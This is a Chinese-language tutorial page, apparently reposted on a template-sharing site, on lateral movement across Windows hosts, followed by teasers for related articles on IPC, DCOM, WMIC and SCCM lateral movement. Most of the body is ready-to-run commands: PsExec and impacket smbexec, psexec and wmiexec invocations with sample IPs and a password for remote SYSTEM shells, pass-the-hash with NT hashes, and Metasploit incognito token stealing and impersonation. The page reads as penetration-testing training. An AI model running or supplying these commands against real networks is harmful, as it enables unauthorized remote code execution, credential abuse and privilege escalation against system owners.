使用外部工具横向移动

这篇具有很好参考价值的文章主要介绍了使用外部工具横向移动。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Smbexe、Psexec

Psexec

PsExec是一种轻巧的telnet代替品,可让您在其他系统上执行进程,并为控制台应用提供完整的交互性,无需手动安装客户端软件。

原理:

1、ipc$连接,释放Psexesvc.exe

2、OpenSCManager打开受害者机器上服务控制管理器的句柄

3、CreateService创建服务

4、获取服务句柄OpenService使用StartService启动服务

建立IPC连接,无需输入密码

net use  \\IP  /user:用户名  密码

反弹cmd

psexec.exe  \\192.168.222.135  -s cmd.exe  -acceptcula

执行命令:

psexec.exe  \\192.168.222.135  whoami  -acceptcula

若没有建立ipc连接则需要使用参数连接

psexec.exe  \\192.168.222.150  -u Administrator -p hjw123...  -s  cmd.exe

使用外部工具横向移动

-acceptcula是指第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框。-s是指以System权限运行远程进程,获得一个System权限的交互式Shell。如果不使用该参数,会获得一个Administrator权限的shell。

Smbexec

smbexec是一款基于psexec的域渗透测试工具

工具集合:impacket/examples at master · fortra/impacket · GitHub

操作:

1、安装依赖

python -m pip install impacket

2、运行smbexec.py

python smbexec.py 用户名:密码@ip地址
python smbexec.py web2/Administrator:hjw123..@192.168.222.136

使用外部工具横向移动

3、还可以运行psexec.py,这里与官方的不同就是可以将痕迹进行清除

python psexec.py 用户名:密码@ip地址
python psexec.py web2/Administrator:hjw123..@192.168.222.136

使用外部工具横向移动

Wmiexec

1、使用wmiexec.py脚本

python wmiexec.py 用户名:密码@ip
python wmiexec.py Administrator:hjw123..@192.168.222.136

使用外部工具横向移动

2、cscript + wmiexec .vbs脚本实现psexec功能

cscript  //nologo  wmiexec.vbs  /shell  ip  用户名  密码
cscript  //nologo  wmiexec.vbs  /shell  192.168.222.135 Administrator hjw123..

解释:这里nologo参数是用来不需要弹窗的

使用外部工具横向移动

这里也可以执行单条命令

使用外部工具横向移动

拓展:wmiexec.py脚本还支持通过hash传递获得shell

python3 wmiexec.py -hashes LMHash:NTHash 域名/用户名@目标IP

Metasploit

1、psexec_command

auxiliary/admin/smb/psexec_command

2、psexec

exploit/windows/smb/psexec 

3、Token窃取

在Metasploit中,可以使用incognito实现token窃取,Metasploit中的incognito,是从windows平台下的incognito移植过来的

//加载incognito模块
load  incognito

//提升权限
getsystem

//列举token
list_tokens -u

//token窃取
impersonate_token  "NT AUTHORITY\\SYSTEM"

//从进程窃取token
steal_token 4567

//返回之前的token
drop_token

token简介:

Windows 的 AccessToken 有两种类型:文章来源地址https://www.toymoban.com/news/detail-471063.html

  • Delegation Token:授权令牌,它支持交互式会话登录 (例如本地用户直接 登录、远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话 (例如使用 net use 访问共享文件夹)。

到了这里,关于使用外部工具横向移动的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用SCCM进行横向移动

    SCCM全名为System Center Configuration Manager,从版本1910开始,微软官方将其从Microsoft System Center产品移除,重新命名为Microsoft Endpoint Configuration Manager(ConfigMgr),其可帮助 IT 部门管理电脑和服务器,保持软件的最新状态,设置配置和安全策略,并监控系统状态,同时让员工能够访

    2024年02月13日
    浏览(32)
  • IPC横向移动

    目录 IPC横向移动 一、IPC介绍 二、IPC利用条件 三、IPC连接失败原因 四、IPC连接常见错误 五、IPC配合计划任务横向移动 六、IPC配合系统服务横向移动 IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码

    2024年02月07日
    浏览(70)
  • DCOM远程执行命令横向移动

    目录 DCOM远程执行命令横向移动 一、DCOM介绍 二、获取DCOM列表 三、DCOM横向条件 四、MMC20.Application远程执行命令 五、ShellWindows远程执行命令 六、ShellBrowserWindow远程执行命令 七、调用Excel.Application远程执行命令 八、Visio.Application远程执行命令 九、Outlook.Application远程执行命令

    2024年02月08日
    浏览(35)
  • WMIC远程执行命令横向移动

    目录 WMIC远程执行命令横向移动 一、wmic介绍 二、wmic常用命令 三、wmic配合powershell上线CS 四、Wmiexec配合powershell上线CS 五、wmiexec.vbs配合powershell上线CS 六、Invoke-WMIExec.ps1配合powershell上线CS 七、Invoke-WMIMethod.ps1上线CS wmic扩展wmi(Windows Management Instrumentation,Windows管理工具) ,提

    2024年02月08日
    浏览(36)
  • 内网安全:IPC协议横向移动

    目录 网络拓扑图 网络环境说明 IPC协议 域渗透实战 域内信息收集:域控主机用户凭据网络 IPC协议横向移动 - 执行命令 一. 建立IPC连接 二. 拷贝执行文件到目标机器 三. 添加计划任务 IPC协议横向移动 - CS插件 IPC协议横向移动 - Impacket(常用) EXE版本测试  Py版本测试 - 代理

    2024年04月25日
    浏览(41)
  • 红队视角下的AWS横向移动

    0x01 前言 本文主要从红队视角讲述AWS公有云中的一些横向移动思路以及对应的一些身份和权限基础。 概括一下AWS横向移动思路:在获得一个凭据(AK、SK等)的前提下,枚举所有可访问资源,再通过可控制资源获得更多的凭据,获得更多资源控制权。 所以本文从下面三个方面

    2024年01月18日
    浏览(32)
  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(42)
  • 域用户枚举和密码喷洒攻击横向移动

    目录 域用户枚举和密码喷洒攻击横向移动 一、域内用户枚举攻击原理 二、域内用户枚举工具 三、密码喷洒攻击原理 四、密码喷洒工具 正常域用户登录主机,我们可以通过 \\\"net user /domain\\\"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 \\\"net user /domain\\\"这

    2024年02月07日
    浏览(29)
  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(42)
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 - 横向移动 利用方式一:wmic命令 利用方式一:cscript 利用方式一:impacket SMB协议 - 横向移动 利用方式一:psexec 利用方式二:psexec.exe 利用方式三:CS插件 利用方式四:Impacket-smbexec 利用方式五:services 域横

    2024年02月11日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包